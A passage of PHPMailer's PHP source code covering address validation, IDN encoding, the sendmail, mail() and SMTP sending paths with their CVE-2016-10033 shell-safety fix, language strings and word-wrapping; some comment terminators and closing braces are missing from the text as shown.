'|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:' .

'|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' .

'|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD',

$address

);

case 'pcre':

//An older regex that doesn't need a recent PCRE

return (boolean)preg_match(

'/^(?!(?>"?(?>\\\[ -~]|[^"])"?){255,})(?!(?>"?(?>\\\[ -~]|[^"])"?){65,}@)(?>' .

'[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*")' .

'(?>\.(?>[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*"))*' .

'@(?>(?![a-z0-9-]{64,})(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)(?>\.(?![a-z0-9-]{64,})' .

'(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)){0,126}|\[(?:(?>IPv6:(?>(?>[a-f0-9]{1,4})(?>:' .

'[a-f0-9]{1,4}){7}|(?!(?:.*[a-f0-9][:\]]){8,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?' .

'::(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?))|(?>(?>IPv6:(?>[a-f0-9]{1,4}(?>:' .

'[a-f0-9]{1,4}){5}:|(?!(?:.*[a-f0-9]:){6,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4})?' .

'::(?>(?:[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4}):)?))?(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}' .

'|[1-9]?[0-9])(?>\.(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}))\])$/isD',

$address

);

case 'html5':

/**

* This is the pattern used in the HTML5 spec for validation of 'email' type form input elements.

* @link http://www.whatwg.org/specs/web-apps/current-work/#e-mail-state-(type=email)

return (boolean)preg_match(

'/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' .

'[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD',

$address

);

case 'noregex':

//No PCRE! Do something _very_ approximate!

//Check the address is 3 chars or longer and contains an @ that's not the first or last char

return (strlen($address) >= 3

and strpos($address, '@') >= 1

and strpos($address, '@') != strlen($address) - 1);

case 'php':

default:

return (boolean)filter_var($address, FILTER_VALIDATE_EMAIL);

}

/**

* Tells whether IDNs (Internationalized Domain Names) are supported or not. This requires the

* "intl" and "mbstring" PHP extensions.

* @return bool "true" if required functions for IDN support are present

public function idnSupported()

// @TODO: Write our own "idn_to_ascii" function for PHP <= 5.2.

return function_exists('idn_to_ascii') and function_exists('mb_convert_encoding');

/**

* Converts IDN in given email address to its ASCII form, also known as punycode, if possible.

* Important: Address must be passed in same encoding as currently set in PHPMailer::$CharSet.

* This function silently returns unmodified address if:

* - No conversion is necessary (i.e. domain name is not an IDN, or is already in ASCII form)

* - Conversion to punycode is impossible (e.g. required PHP functions are not available)

* or fails for any reason (e.g. domain has characters not allowed in an IDN)

* @see PHPMailer::$CharSet

* @param string $address The email address to convert

* @return string The encoded address in ASCII form

public function punyencodeAddress($address)

// Verify we have required functions, CharSet, and at-sign.

if ($this->idnSupported() and

!empty($this->CharSet) and

($pos = strrpos($address, '@')) !== false) {

$domain = substr($address, ++$pos);

// Verify CharSet string is a valid one, and domain properly encoded in this CharSet.

if ($this->has8bitChars($domain) and @mb_check_encoding($domain, $this->CharSet)) {

$domain = mb_convert_encoding($domain, 'UTF-8', $this->CharSet);

if (($punycode = defined('INTL_IDNA_VARIANT_UTS46') ?

idn_to_ascii($domain, 0, INTL_IDNA_VARIANT_UTS46) :

idn_to_ascii($domain)) !== false) {

return substr($address, 0, $pos) . $punycode;

}

return $address;

/**

* Create a message and send it.

* Uses the sending method specified by $Mailer.

* @throws phpmailerException

* @return boolean false on error - See the ErrorInfo property for details of the error.

public function send()

try {

if (!$this->preSend()) {

return false;

}

return $this->postSend();

} catch (phpmailerException $exc) {

$this->mailHeader = '';

$this->setError($exc->getMessage());

if ($this->exceptions) {

throw $exc;

}

return false;

}

/**

* Prepare a message for sending.

* @throws phpmailerException

* @return boolean

public function preSend()

try {

$this->error_count = 0; // Reset errors

$this->mailHeader = '';

// Dequeue recipient and Reply-To addresses with IDN

foreach (array_merge($this->RecipientsQueue, $this->ReplyToQueue) as $params) {

$params[1] = $this->punyencodeAddress($params[1]);

call_user_func_array(array($this, 'addAnAddress'), $params);

}

if ((count($this->to) + count($this->cc) + count($this->bcc)) < 1) {

throw new phpmailerException($this->lang('provide_address'), self::STOP_CRITICAL);

}

// Validate From, Sender, and ConfirmReadingTo addresses

foreach (array('From', 'Sender', 'ConfirmReadingTo') as $address_kind) {

$this->$address_kind = trim($this->$address_kind);

if (empty($this->$address_kind)) {

continue;

}

$this->$address_kind = $this->punyencodeAddress($this->$address_kind);

if (!$this->validateAddress($this->$address_kind)) {

$error_message = $this->lang('invalid_address') . ' (punyEncode) ' . $this->$address_kind;

$this->setError($error_message);

$this->edebug($error_message);

if ($this->exceptions) {

throw new phpmailerException($error_message);

}

return false;

}

// Set whether the message is multipart/alternative

if ($this->alternativeExists()) {

$this->ContentType = 'multipart/alternative';

}

$this->setMessageType();

// Refuse to send an empty message unless we are specifically allowing it

if (!$this->AllowEmpty and empty($this->Body)) {

throw new phpmailerException($this->lang('empty_message'), self::STOP_CRITICAL);

}

// Create body before headers in case body makes changes to headers (e.g. altering transfer encoding)

$this->MIMEHeader = '';

$this->MIMEBody = $this->createBody();

// createBody may have added some headers, so retain them

$tempheaders = $this->MIMEHeader;

$this->MIMEHeader = $this->createHeader();

$this->MIMEHeader .= $tempheaders;

// To capture the complete message when using mail(), create

// an extra header list which createHeader() doesn't fold in

if ($this->Mailer == 'mail') {

if (count($this->to) > 0) {

$this->mailHeader .= $this->addrAppend('To', $this->to);

} else {

$this->mailHeader .= $this->headerLine('To', 'undisclosed-recipients:;');

}

$this->mailHeader .= $this->headerLine(

'Subject',

$this->encodeHeader($this->secureHeader(trim($this->Subject)))

);

}

// Sign with DKIM if enabled

if (!empty($this->DKIM_domain)

and !empty($this->DKIM_selector)

and (!empty($this->DKIM_private_string)

or (!empty($this->DKIM_private)

and self::isPermittedPath($this->DKIM_private)

and file_exists($this->DKIM_private)

)

) {

$header_dkim = $this->DKIM_Add(

$this->MIMEHeader . $this->mailHeader,

$this->encodeHeader($this->secureHeader($this->Subject)),

$this->MIMEBody

);

$this->MIMEHeader = rtrim($this->MIMEHeader, "\r\n ") . self::CRLF .

str_replace("\r\n", "\n", $header_dkim) . self::CRLF;

}

return true;

} catch (phpmailerException $exc) {

$this->setError($exc->getMessage());

if ($this->exceptions) {

throw $exc;

}

return false;

}

/**

* Actually send a message.

* Send the email via the selected mechanism

* @throws phpmailerException

* @return boolean

public function postSend()

try {

// Choose the mailer and send through it

switch ($this->Mailer) {

case 'sendmail':

case 'qmail':

return $this->sendmailSend($this->MIMEHeader, $this->MIMEBody);

case 'smtp':

return $this->smtpSend($this->MIMEHeader, $this->MIMEBody);

case 'mail':

return $this->mailSend($this->MIMEHeader, $this->MIMEBody);

default:

$sendMethod = $this->Mailer.'Send';

if (method_exists($this, $sendMethod)) {

return $this->$sendMethod($this->MIMEHeader, $this->MIMEBody);

}

return $this->mailSend($this->MIMEHeader, $this->MIMEBody);

}

} catch (phpmailerException $exc) {

$this->setError($exc->getMessage());

$this->edebug($exc->getMessage());

if ($this->exceptions) {

throw $exc;

}

return false;

/**

* Send mail using the $Sendmail program.

* @param string $header The message headers

* @param string $body The message body

* @see PHPMailer::$Sendmail

* @throws phpmailerException

* @access protected

* @return boolean

protected function sendmailSend($header, $body)

// CVE-2016-10033, CVE-2016-10045: Don't pass -f if characters will be escaped.

if (!empty($this->Sender) and self::isShellSafe($this->Sender)) {

if ($this->Mailer == 'qmail') {

$sendmailFmt = '%s -f%s';

} else {

$sendmailFmt = '%s -oi -f%s -t';

}

} else {

if ($this->Mailer == 'qmail') {

$sendmailFmt = '%s';

} else {

$sendmailFmt = '%s -oi -t';

}

// TODO: If possible, this should be changed to escapeshellarg. Needs thorough testing.

$sendmail = sprintf($sendmailFmt, escapeshellcmd($this->Sendmail), $this->Sender);

if ($this->SingleTo) {

foreach ($this->SingleToArray as $toAddr) {

if (!@$mail = popen($sendmail, 'w')) {

throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);

}

fputs($mail, 'To: ' . $toAddr . "\n");

fputs($mail, $header);

fputs($mail, $body);

$result = pclose($mail);

$this->doCallback(

($result == 0),

array($toAddr),

$this->cc,

$this->bcc,

$this->Subject,

$body,

$this->From

);

if ($result != 0) {

throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);

}

} else {

if (!@$mail = popen($sendmail, 'w')) {

throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);

}

fputs($mail, $header);

fputs($mail, $body);

$result = pclose($mail);

$this->doCallback(

($result == 0),

$this->to,

$this->cc,

$this->bcc,

$this->Subject,

$body,

$this->From

);

if ($result != 0) {

throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);

}

return true;

/**

* Fix CVE-2016-10033 and CVE-2016-10045 by disallowing potentially unsafe shell characters.

* Note that escapeshellarg and escapeshellcmd are inadequate for our purposes, especially on Windows.

* @param string $string The string to be validated

* @see https://github.com/PHPMailer/PHPMailer/issues/924 CVE-2016-10045 bug report

* @access protected

* @return boolean

protected static function isShellSafe($string)

// Future-proof

if (escapeshellcmd($string) !== $string

or !in_array(escapeshellarg($string), array("'$string'", "\"$string\""))

) {

return false;

}

$length = strlen($string);

for ($i = 0; $i < $length; $i++) {

$c = $string[$i];

// All other characters have a special meaning in at least one common shell, including = and +.

// Full stop (.) has a special meaning in cmd.exe, but its impact should be negligible here.

// Note that this does permit non-Latin alphanumeric characters based on the current locale.

if (!ctype_alnum($c) && strpos('@_-.', $c) === false) {

return false;

}

return true;

/**

* Check whether a file path is of a permitted type.

* Used to reject URLs and phar files from functions that access local file paths,

* such as addAttachment.

* @param string $path A relative or absolute path to a file.

* @return bool

protected static function isPermittedPath($path)

return !preg_match('#^[a-z]+://#i', $path);

/**

* Send mail using the PHP mail() function.

* @param string $header The message headers

* @param string $body The message body

* @link http://www.php.net/manual/en/book.mail.php

* @throws phpmailerException

* @access protected

* @return boolean

protected function mailSend($header, $body)

$toArr = array();

foreach ($this->to as $toaddr) {

$toArr[] = $this->addrFormat($toaddr);

}

$to = implode(', ', $toArr);

$params = null;

//This sets the SMTP envelope sender which gets turned into a return-path header by the receiver

if (!empty($this->Sender) and $this->validateAddress($this->Sender)) {

// CVE-2016-10033, CVE-2016-10045: Don't pass -f if characters will be escaped.

if (self::isShellSafe($this->Sender)) {

$params = sprintf('-f%s', $this->Sender);

}

if (!empty($this->Sender) and !ini_get('safe_mode') and $this->validateAddress($this->Sender)) {

$old_from = ini_get('sendmail_from');

ini_set('sendmail_from', $this->Sender);

}

$result = false;

if ($this->SingleTo and count($toArr) > 1) {

foreach ($toArr as $toAddr) {

$result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);

$this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From);

}

} else {

$result = $this->mailPassthru($to, $this->Subject, $body, $header, $params);

$this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);

}

if (isset($old_from)) {

ini_set('sendmail_from', $old_from);

}

if (!$result) {

throw new phpmailerException($this->lang('instantiate'), self::STOP_CRITICAL);

}

return true;

/**

* Get an instance to use for SMTP operations.

* Override this function to load your own SMTP implementation

* @return SMTP

public function getSMTPInstance()

if (!is_object($this->smtp)) {

$this->smtp = new SMTP;

}

return $this->smtp;

/**

* Send mail via SMTP.

* Returns false if there is a bad MAIL FROM, RCPT, or DATA input.

* Uses the PHPMailerSMTP class by default.

* @see PHPMailer::getSMTPInstance() to use a different class.

* @param string $header The message headers

* @param string $body The message body

* @throws phpmailerException

* @uses SMTP

* @access protected

* @return boolean

protected function smtpSend($header, $body)

$bad_rcpt = array();

if (!$this->smtpConnect($this->SMTPOptions)) {

throw new phpmailerException($this->lang('smtp_connect_failed'), self::STOP_CRITICAL);

}

if (!empty($this->Sender) and $this->validateAddress($this->Sender)) {

$smtp_from = $this->Sender;

} else {

$smtp_from = $this->From;

}

if (!$this->smtp->mail($smtp_from)) {

$this->setError($this->lang('from_failed') . $smtp_from . ' : ' . implode(',', $this->smtp->getError()));

throw new phpmailerException($this->ErrorInfo, self::STOP_CRITICAL);

}

// Attempt to send to all recipients

foreach (array($this->to, $this->cc, $this->bcc) as $togroup) {

foreach ($togroup as $to) {

if (!$this->smtp->recipient($to[0])) {

$error = $this->smtp->getError();

$bad_rcpt[] = array('to' => $to[0], 'error' => $error['detail']);

$isSent = false;

} else {

$isSent = true;

}

$this->doCallback($isSent, array($to[0]), array(), array(), $this->Subject, $body, $this->From);

}

// Only send the DATA command if we have viable recipients

if ((count($this->all_recipients) > count($bad_rcpt)) and !$this->smtp->data($header . $body)) {

throw new phpmailerException($this->lang('data_not_accepted'), self::STOP_CRITICAL);

}

if ($this->SMTPKeepAlive) {

$this->smtp->reset();

} else {

$this->smtp->quit();

$this->smtp->close();

}

//Create error message for any bad addresses

if (count($bad_rcpt) > 0) {

$errstr = '';

foreach ($bad_rcpt as $bad) {

$errstr .= $bad['to'] . ': ' . $bad['error'];

}

throw new phpmailerException(

$this->lang('recipients_failed') . $errstr,

self::STOP_CONTINUE

);

}

return true;

/**

* Initiate a connection to an SMTP server.

* Returns false if the operation failed.

* @param array $options An array of options compatible with stream_context_create()

* @uses SMTP

* @access public

* @throws phpmailerException

* @return boolean

public function smtpConnect($options = null)

if (is_null($this->smtp)) {

$this->smtp = $this->getSMTPInstance();

}

//If no options are provided, use whatever is set in the instance

if (is_null($options)) {

$options = $this->SMTPOptions;

}

// Already connected?

if ($this->smtp->connected()) {

return true;

}

$this->smtp->setTimeout($this->Timeout);

$this->smtp->setDebugLevel($this->SMTPDebug);

$this->smtp->setDebugOutput($this->Debugoutput);

$this->smtp->setVerp($this->do_verp);

$hosts = explode(';', $this->Host);

$lastexception = null;

foreach ($hosts as $hostentry) {

$hostinfo = array();

if (!preg_match(

'/^((ssl|tls):\/\/)*([a-zA-Z0-9\.-]*|\[[a-fA-F0-9:]+\]):?([0-9]*)$/',

trim($hostentry),

$hostinfo

)) {

// Not a valid host entry

$this->edebug('Ignoring invalid host: ' . $hostentry);

continue;

}

// $hostinfo[2]: optional ssl or tls prefix

// $hostinfo[3]: the hostname

// $hostinfo[4]: optional port number

// The host string prefix can temporarily override the current setting for SMTPSecure

// If it's not specified, the default value is used

$prefix = '';

$secure = $this->SMTPSecure;

$tls = ($this->SMTPSecure == 'tls');

if ('ssl' == $hostinfo[2] or ('' == $hostinfo[2] and 'ssl' == $this->SMTPSecure)) {

$prefix = 'ssl://';

$tls = false; // Can't have SSL and TLS at the same time

$secure = 'ssl';

} elseif ($hostinfo[2] == 'tls') {

$tls = true;

// tls doesn't use a prefix

$secure = 'tls';

}

//Do we need the OpenSSL extension?

$sslext = defined('OPENSSL_ALGO_SHA1');

if ('tls' === $secure or 'ssl' === $secure) {

//Check for an OpenSSL constant rather than using extension_loaded, which is sometimes disabled

if (!$sslext) {

throw new phpmailerException($this->lang('extension_missing').'openssl', self::STOP_CRITICAL);

}

$host = $hostinfo[3];

$port = $this->Port;

$tport = (integer)$hostinfo[4];

if ($tport > 0 and $tport < 65536) {

$port = $tport;

}

if ($this->smtp->connect($prefix . $host, $port, $this->Timeout, $options)) {

try {

if ($this->Helo) {

$hello = $this->Helo;

} else {

$hello = $this->serverHostname();

}

$this->smtp->hello($hello);

//Automatically enable TLS encryption if:

// * it's not disabled

// * we have openssl extension

// * we are not already using SSL

// * the server offers STARTTLS

if ($this->SMTPAutoTLS and $sslext and $secure != 'ssl' and $this->smtp->getServerExt('STARTTLS')) {

$tls = true;

}

if ($tls) {

if (!$this->smtp->startTLS()) {

throw new phpmailerException($this->lang('connect_host'));

}

// We must resend EHLO after TLS negotiation

$this->smtp->hello($hello);

}

if ($this->SMTPAuth) {

if (!$this->smtp->authenticate(

$this->Username,

$this->Password,

$this->AuthType,

$this->Realm,

$this->Workstation

)

) {

throw new phpmailerException($this->lang('authenticate'));

}

return true;

} catch (phpmailerException $exc) {

$lastexception = $exc;

$this->edebug($exc->getMessage());

// We must have connected, but then failed TLS or Auth, so close connection nicely

$this->smtp->quit();

}

// If we get here, all connection attempts have failed, so close connection hard

$this->smtp->close();

// As we've caught all exceptions, just report whatever the last one was

if ($this->exceptions and !is_null($lastexception)) {

throw $lastexception;

}

return false;

/**

* Close the active SMTP session if one exists.

* @return void

public function smtpClose()

if (is_a($this->smtp, 'SMTP')) {

if ($this->smtp->connected()) {

$this->smtp->quit();

$this->smtp->close();

}

/**

* Set the language for error messages.

* Returns false if it cannot load the language file.

* The default language is English.

* @param string $langcode ISO 639-1 2-character language code (e.g. French is "fr")

* @param string $lang_path Path to the language file directory, with trailing separator (slash)

* @return boolean

* @access public

public function setLanguage($langcode = 'en', $lang_path = '')

// Backwards compatibility for renamed language codes

$renamed_langcodes = array(

'br' => 'pt_br',

'cz' => 'cs',

'dk' => 'da',

'no' => 'nb',

'se' => 'sv',

'sr' => 'rs'

);

if (isset($renamed_langcodes[$langcode])) {

$langcode = $renamed_langcodes[$langcode];

}

// Define full set of translatable strings in English

$PHPMAILER_LANG = array(

'authenticate' => 'SMTP Error: Could not authenticate.',

'connect_host' => 'SMTP Error: Could not connect to SMTP host.',

'data_not_accepted' => 'SMTP Error: data not accepted.',

'empty_message' => 'Message body empty',

'encoding' => 'Unknown encoding: ',

'execute' => 'Could not execute: ',

'file_access' => 'Could not access file: ',

'file_open' => 'File Error: Could not open file: ',

'from_failed' => 'The following From address failed: ',

'instantiate' => 'Could not instantiate mail function.',

'invalid_address' => 'Invalid address: ',

'mailer_not_supported' => ' mailer is not supported.',

'provide_address' => 'You must provide at least one recipient email address.',

'recipients_failed' => 'SMTP Error: The following recipients failed: ',

'signing' => 'Signing Error: ',

'smtp_connect_failed' => 'SMTP connect() failed.',

'smtp_error' => 'SMTP server error: ',

'variable_set' => 'Cannot set or reset variable: ',

'extension_missing' => 'Extension missing: '

);

if (empty($lang_path)) {

// Calculate an absolute path so it can work if CWD is not here

$lang_path = dirname(__FILE__). DIRECTORY_SEPARATOR . 'language'. DIRECTORY_SEPARATOR;

}

//Validate $langcode

if (!preg_match('/^[a-z]{2}(?:_[a-zA-Z]{2})?$/', $langcode)) {

$langcode = 'en';

}

$foundlang = true;

$lang_file = $lang_path . 'phpmailer.lang-' . $langcode . '.php';

// There is no English translation file

if ($langcode != 'en') {

// Make sure language file path is readable

if (!self::isPermittedPath($lang_file) or !is_readable($lang_file)) {

$foundlang = false;

} else {

// Overwrite language-specific strings.

// This way we'll never have missing translation keys.

$foundlang = include $lang_file;

}

$this->language = $PHPMAILER_LANG;

return (boolean)$foundlang; // Returns false if language not found

/**

* Get the array of strings for the current language.

* @return array

public function getTranslations()

return $this->language;

/**

* Create recipient headers.

* @access public

* @param string $type

* @param array $addr An array of recipient,

* where each recipient is a 2-element indexed array with element 0 containing an address

* and element 1 containing a name, like:

* array(array('joe@example.com', 'Joe User'), array('zoe@example.com', 'Zoe User'))

* @return string

public function addrAppend($type, $addr)

$addresses = array();

foreach ($addr as $address) {

$addresses[] = $this->addrFormat($address);

}

return $type . ': ' . implode(', ', $addresses) . $this->LE;

/**

* Format an address for use in a message header.

* @access public

* @param array $addr A 2-element indexed array, element 0 containing an address, element 1 containing a name

* like array('joe@example.com', 'Joe User')

* @return string

public function addrFormat($addr)

if (empty($addr[1])) { // No name provided

return $this->secureHeader($addr[0]);

} else {

return $this->encodeHeader($this->secureHeader($addr[1]), 'phrase') . ' <' . $this->secureHeader(

$addr[0]

) . '>';

}

/**

* Word-wrap message.

* For use with mailers that do not automatically perform wrapping

* and for quoted-printable encoded messages.

* Original written by philippe.

* @param string $message The message to wrap

* @param integer $length The line length to wrap to

* @param boolean $qp_mode Whether to run in Quoted-Printable mode

* @access public

* @return string

public function wrapText($message, $length, $qp_mode = false)

if ($qp_mode) {

$soft_break = sprintf(' =%s', $this->LE);

} else {

$soft_break = $this->LE;

}

// If utf-8 encoding is used, we will need to make sure we don't

// split multibyte characters when we wrap

$is_utf8 = (strtolower($this->CharSet) == 'utf-8');

$lelen = strlen($this->LE);

$crlflen = strlen(self::CRLF);

$message = $this->fixEOL($message);

//Remove a trailing line break

if (substr($message, -$lelen) == $this->LE) {

$message = substr($message, 0, -$lelen);

}

//Split message into lines

$lines = explode($this->LE, $message);

//Message will be rebuilt in here

$message = '';

foreach ($lines as $line) {

$words = explode(' ', $line);

$buf = '';

$firstword = true;

foreach ($words as $word) {

if ($qp_mode and (strlen($word) > $length)) {

$space_left = $length - strlen($buf) - $crlflen;

if (!$firstword) {

if ($space_left > 20) {

$len = $space_left;

if ($is_utf8) {

$len = $this->utf8CharBoundary($word, $len);

} elseif (substr($word, $len - 1, 1) == '=') {

$len--;

} elseif (substr($word, $len - 2, 1) == '=') {

$len -= 2;

}

$part = substr($word, 0, $len);

$word = substr($word, $len);

$buf .= ' ' . $part;

$message .= $buf . sprintf('=%s', self::CRLF);

} else {

$message .= $buf . $soft_break;

}

$buf = '';

}

while (strlen($word) > 0) {

if ($length <= 0) {

break;

}

$len = $length;

if ($is_utf8) {

$len = $this->utf8CharBoundary($word, $len);

} elseif (substr($word, $len - 1, 1) == '=') {

$len--;

} elseif (substr($word, $len - 2, 1) == '=') {

$len -= 2;

}

$part = substr($word, 0, $len);

$word = substr($word, $len);

if (strlen($word) > 0) {

$message .= $part . sprintf('=%s', self::CRLF);

} else {

$buf = $part;

}

} else {

$buf_o = $buf;

if (!$firstword) {

$buf .= ' ';

}

$buf .= $word;

if (strlen($buf) > $length and $buf_o != '') {

$message .= $buf_o . $soft_break;

$buf = $word;

}

$firstword = false;

}

$message .= $buf . self::CRLF;

}

return $message;

/**

* Find the last character boundary prior to $maxLength in a utf-8

* quoted-printable encoded string.

* Original written by Colin Brown.

* @access public

* @param string $encodedText utf-8 QP text

* @param integer $maxLength Find the last character boundary prior to this length

* @return integer

public function utf8CharBoundary($encodedText, $maxLength)

$foundSplitPos = false;

$lookBack = 3;

while (!$foundSplitPos) {

$lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack);

$encodedCharPos = strpos($lastChunk, '=');

if (false !== $encodedCharPos) {

// Found start of encoded character byte within $lookBack block.

// Check the encoded byte value (the 2 chars after the '=')

$hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2);

$dec = hexdec($hex);

if ($dec < 128) {

// Single byte character.

// If the encoded char was found at pos 0, it will fit

// otherwise reduce maxLength to start of the encoded char

if ($encodedCharPos > 0) {

$maxLength = $maxLength - ($lookBack - $encodedCharPos);

}

$foundSplitPos = true;

} elseif ($dec >= 192) {

// First byte of a multi byte character

// Reduce maxLength to split at start of character

$maxLength = $maxLength - ($lookBack - $encodedCharPos);

$foundSplitPos = true;

} elseif ($dec < 192) {

// Middle byte of a multi byte character, look further back

$lookBack += 3;

}

} else {

// No encoded character found

$foundSplitPos = true;

}

return $maxLength;

/**

* Apply word wrapping to the message body.

* Wraps the message body to the number of chars set in the WordWrap property.

* You should only do this to plain-text bodies as wrapping HTML tags may break them.

* This is called automatically by createBody(), so you don't need to call it yourself.

* @access public

* @return void

public function setWordWrap()

if ($this->WordWrap < 1) {

return;

}

switch ($this->message_type) {

case 'alt':

case 'alt_inline':

case 'alt_attach':

case 'alt_inline_attach':

$this->AltBody = $this->wrapText($this->AltBody, $this->WordWrap);

break;

default:

$this->Body = $this->wrapText($this->Body, $this->WordWrap);

break;

}

/**

* Assemble message headers.

* @access public

* @return string The assembled headers

public function createHeader()

$result = '';

$result .= $this->headerLine('Date', $this->MessageDate == '' ? self::rfcDate() : $this->MessageDate);

// To be created automatically by mail()

if ($this->SingleTo) {

if ($this->Mailer != 'mail') {

foreach ($this->to as $toaddr) {

$this->SingleToArray[] = $this->addrFormat($toaddr);

}

} else {